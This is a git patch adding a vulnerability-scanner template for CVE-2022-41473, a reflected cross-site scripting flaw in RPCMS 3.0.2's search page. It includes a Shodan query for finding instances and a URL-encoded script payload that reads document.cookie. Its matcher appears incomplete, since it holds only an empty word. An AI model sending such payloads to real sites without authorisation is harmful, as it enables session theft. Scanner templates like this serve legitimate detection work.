From e8e6dfc13bfb5a801ce1cc302c0cda716644ed6c Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Mon, 17 Oct 2022 10:21:54 +0530 Subject: [PATCH] Create CVE-2022-41473.yaml --- cves/2022/CVE-2022-41473.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2022/CVE-2022-41473.yaml diff --git a/cves/2022/CVE-2022-41473.yaml b/cves/2022/CVE-2022-41473.yaml new file mode 100644 index 0000000000..5061bc71ab --- /dev/null +++ b/cves/2022/CVE-2022-41473.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-41473 + +info: + name: RPCMS 3.0.2 - Cross-site scripting (XSS) + author: arafatansari + severity: medium + description: | + RPCMS v3.0.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Search function. + reference: + - https://github.com/ralap-z/rpcms/issues/1 + metadata: + shodan-query: http.html:"RPCMS" + verified: "true" + tags: xss,cve,2022 + +requests: + - raw: + - | + GET /search/?q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + condition: and